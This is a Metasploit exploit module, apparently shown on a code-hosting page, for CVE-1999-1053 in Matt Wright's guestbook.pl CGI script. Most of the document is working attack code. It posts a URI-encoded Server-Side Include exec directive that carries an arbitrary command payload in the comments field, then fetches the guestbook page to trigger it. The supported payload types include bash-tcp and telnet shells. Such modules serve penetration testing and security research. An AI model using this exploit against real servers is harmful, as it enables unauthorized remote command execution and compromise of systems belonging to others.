Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Matt Wright guestbook.pl Arbitrary Command Execution',
14
      'Description'    => %q{
15
        The Matt Wright guestbook.pl <= v2.3.1 CGI script contains
16
        a flaw that may allow arbitrary command execution. The vulnerability
17
        requires that HTML posting is enabled in the guestbook.pl script, and
18
        that the web server must have the Server-Side Include (SSI) script
19
        handler enabled for the '.html' file type. By combining the script
20
        weakness with non-default server configuration, it is possible to exploit
21
        this vulnerability successfully.
22
      },
23
      'Author'         => [ 'aushack' ],
24
      'License'        => MSF_LICENSE,
25
      'References'     =>
26
        [
27
          [ 'CVE', '1999-1053' ],
28
          [ 'OSVDB', '84' ],
29
          [ 'BID', '776' ],
30
        ],
31
      'Privileged'     => false,
32
      'Payload'        =>
33
        {
34
          'DisableNops' => true,
35
          'Space'       => 1024,
36
          'Compat'      =>
37
            {
38
              'PayloadType' => 'cmd cmd_bash',
39
              'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
40
            }
41
        },
42
      'Platform'       => %w{ linux unix win },
43
      'Arch'           => ARCH_CMD,
44
      'Targets'        => [[ 'Automatic', { }]],
45
      'DisclosureDate' => '1999-11-05',
46
      'DefaultTarget'  => 0))
47

48
      register_options(
49
        [
50
          OptString.new('URI', [true, "guestbook.pl script path", "/cgi-bin/guestbook.pl"]),
51
          OptString.new('URIOUT', [true, "guestbook.html output", "/guestbook/guestbook.html"]),
52
        ])
53
  end
54

55
  def exploit
56
    realname	= rand_text_alphanumeric(20)
57
    email		= rand_text_alphanumeric(20)
58
    city		= rand_text_alphanumeric(20)
59
    state		= rand_text_alphanumeric(20)
60
    country 	= rand_text_alphanumeric(20)
61

62
    sploit = Rex::Text.uri_encode("<!--#exec cmd=\"" + payload.encoded.gsub('"','\"') + "\"", 'hex-normal')
63

64
    req1 = send_request_cgi({
65
      'uri'     => normalize_uri(datastore['URI']),
66
      'method'  => 'POST',
67
      'data'    => "realname=#{realname}&username=#{email}&city=#{city}&state=#{state}&country=#{country}&comments=#{sploit}",
68
    }, 25)
69

70
    req2 = send_request_raw({
71
      'uri'     => normalize_uri(datastore['URIOUT']),
72
    }, 25)
73

74
  end
75
end
76

77